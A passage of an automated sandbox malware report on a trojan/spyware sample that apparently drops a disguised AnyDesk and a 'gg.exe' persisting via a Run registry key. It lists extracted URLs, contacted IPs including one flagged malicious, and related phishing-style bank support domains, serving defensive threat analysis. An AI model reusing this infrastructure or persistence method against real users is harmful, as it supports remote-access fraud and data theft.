                                                                                                                https://anydesk.com/en/assemblyAnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressinggg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuegg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://datatracker.ietf.org/ipr/1524/AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://my.anydesk.com/v2AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://anydesk.com/company#imprintAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id10ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsegg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.openssl.org/)AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://anydesk.com/pricing/teams)AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id5Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsgg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Entity/Id15ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://tempuri.org/Entity/Id10Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Renewgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tempuri.org/Entity/Id8Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://support.anydesk.com/knowledge/quick-start-guidewJAnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.gimp.org/xmp/AnyDesk.exe, 00000010.00000002.2893264351.0000000006E60000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891388326.00000000047A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentitygg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://anydesk.com/de/datenschutzAnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeygg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dartbug.com/52121.embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://my.anydesk.comAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://support.anydesk.com/knowledge/waiting-for-image-black-screenhAnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.openssl.org/support/faq.htmlAnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://tempuri.org/Dgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingexgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://github.com/dart-lang/sdk/blob/master/runtime/docs/compiler/aot/entry_point_pragma.mdembedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncegg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://anydesk.com/pricing/teamsAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://support.anydesk.com/knowledge/quick-start-guide%AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://tempuri.org/Entity/Id13Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://tempuri.org/Entity/Id12ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Committedgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://anydesk.com/en/assembly/termsAnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://support.anydesk.com/knowledge/quick-start-guide4AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertygg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://support.anydesk.comAnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://support.anydesk.com/knowledge/waiting-for-image-black-screenAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id7ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown

                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  185.229.191.44
                                                                                                                                                                                                  		boot.net.anydesk.comCzech Republic
                                                                                                                                                                                                  		60068CDN77GBfalse
                                                                                                                                                                                                  67.203.7.148
                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                  		21769AS-COLOAMUStrue
                                                                                                                                                                                                  64.31.23.26
                                                                                                                                                                                                  		relay-6a630189.net.anydesk.comUnited States
                                                                                                                                                                                                  		46475LIMESTONENETWORKSUSfalse
                                                                                                                                                                                                  18.173.219.85
                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                  		3MIT-GATEWAYSUSfalse

                                                                                                                                                                                                  General Information

                                                                                                                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                  Analysis ID:1402122
                                                                                                                                                                                                  Start date and time:2024-03-03 13:31:09 +01:00
                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 10m 6s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                  Number of analysed new started processes analysed:28
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                  Sample name:SysrI6zSkJ.exe
                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                  Original Sample Name:2e501240ec8b9aab46d76a6504e44882.exe
                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal76.troj.spyw.evad.winEXE@39/13@3/4
                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                  • Successful, ratio: 58%
                                                                                                                                                                                                  • Number of executed functions: 294
                                                                                                                                                                                                  • Number of non-executed functions: 152
                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                  • Execution Graph export aborted for target SysrI6zSkJ.exe, PID 6472 because it is empty
                                                                                                                                                                                                  • Execution Graph export aborted for target embedded.exe, PID 6904 because it is empty
                                                                                                                                                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                  • VT rate limit hit for: SysrI6zSkJ.exe

                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                  12:31:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Repository C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                  12:32:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Repository C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                  13:32:02API Interceptor2x Sleep call for process: AnyDesk.exe modified
                                                                                                                                                                                                  13:32:06API Interceptor94x Sleep call for process: gg.exe modified

                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                  IPs

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  185.229.191.44https://nab-support.com/LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    Project.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      anydesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        livechat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                AnyDesk-CM.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  AnyDesk (2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      67.203.7.148Ihlya7zz0r.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                        64.31.23.26https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          anydesk.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            relay-6a630189.net.anydesk.comhttps://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            anydesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            boot.net.anydesk.comAnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 141.95.145.210
                                                                                                                                                                                                                            AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 92.223.88.232
                                                                                                                                                                                                                            http://sub.nabprotect-livechat.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.229.191.39
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 141.95.145.210
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 57.128.101.74
                                                                                                                                                                                                                            https://nab-support.com/LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://bendigo-desk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 49.12.130.236
                                                                                                                                                                                                                            https://bendigo-desk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 92.223.88.232
                                                                                                                                                                                                                            Project.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 57.128.101.78
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 49.12.130.236
                                                                                                                                                                                                                            d1atxff5avezsq.cloudfront.nethttps://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.33.82.105
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.33.82.26
                                                                                                                                                                                                                            https://nab-support.com/LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.224.14.115
                                                                                                                                                                                                                            https://bendigo-desk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.154.144.27
                                                                                                                                                                                                                            Project.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.238.192.9
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.161.136.116
                                                                                                                                                                                                                            LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.224.214.128
                                                                                                                                                                                                                            LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.224.214.48
                                                                                                                                                                                                                            https://bnz-portal.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 99.84.160.61
                                                                                                                                                                                                                            AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.67.39.87

                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            MIT-GATEWAYSUSktMLmEUY2l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 18.93.162.120
                                                                                                                                                                                                                            WkjYJEadMJ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 19.79.228.234
                                                                                                                                                                                                                            nL4rzMSCVd.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 19.225.129.158
                                                                                                                                                                                                                            https://manual-restore.pages.dev/IP:Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.164.96.69
                                                                                                                                                                                                                            http://hip-foul-face.glitch.me/makslfqwlw38laii.htmlIP:Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.173.219.74
                                                                                                                                                                                                                            https://aolserv.pages.dev/robots.txtIP:Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 18.164.96.113
                                                                                                                                                                                                                            http://www.hkemploymentlaw.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.164.116.70
                                                                                                                                                                                                                            SecuriteInfo.com.MacOS.ReverseShell-C.30585.8425.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                                                                                                                                                            • 18.164.96.22
                                                                                                                                                                                                                            JiD2VwpPLD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 19.66.42.224
                                                                                                                                                                                                                            Ql8DJ8wEuI.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 128.30.43.214
                                                                                                                                                                                                                            CDN77GBhttps://u3475401.ct.sendgrid.net/ls/click?upn=u001.0-2BOjl-2BZg3Rqumxt-2BL7adNSm8oShdqLcKfe3phwTJM2sm2GgvhjDlDlifxUG2C9lGvkFx_BS-2FCGvsXme-2BolZM92Eoni-2FdtdMvSpGU1Lrwe4I6quydUxKPtzR8lyAmi7xMrMCMMIUNSXrpDIpqh-2FqvvAK2cGe6q-2B2YQnbfa5DfcPXKwHcqBYWlQBKyEBmOUvcM-2FV3SpgQ5DT8vuunLHHFJrV-2FlE1zhEvTw1NYwEfo-2BAUWZzvVzZdMJNITwE9aVRolXPoIqnd0gkznPM82I8tZ5vY6VQTwyoQURRvJM7Ykq6CcNXqibCj6vfSW1-2Ffbuta9t-2BFMxKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.16
                                                                                                                                                                                                                            https://www.Sunfest.com/tickets?squadup-promo=sun24group-discountGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.17
                                                                                                                                                                                                                            https://nalders.uk/dq.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.167.3
                                                                                                                                                                                                                            http://www.sunfest.com/tickets?squadup-promo=sun24group-discountGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.17
                                                                                                                                                                                                                            http://optimalrebalancing.tkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.167.3
                                                                                                                                                                                                                            NZXT-CAM-Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.93.1.251
                                                                                                                                                                                                                            https://lp.vp4.me/tksfGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                            • 89.187.177.17
                                                                                                                                                                                                                            https://www.webtoon.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.16
                                                                                                                                                                                                                            Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 89.187.177.16
                                                                                                                                                                                                                            http://boomba.clubGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 156.146.36.23
                                                                                                                                                                                                                            AS-COLOAMUSIhlya7zz0r.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                            • 67.203.7.148
                                                                                                                                                                                                                            NEW ORDER.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                            • 67.207.161.253
                                                                                                                                                                                                                            GGBz0FS1z4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.195.214.9
                                                                                                                                                                                                                            bT5nWJkvh0.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 67.227.21.224
                                                                                                                                                                                                                            lEcx2N6LTK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 67.203.3.32
                                                                                                                                                                                                                            Bdk58TYebF.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 67.203.3.34
                                                                                                                                                                                                                            ZhhHfkNewm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 162.223.197.223
                                                                                                                                                                                                                            jklarm.elfGet hashmaliciousMiraiBrowse
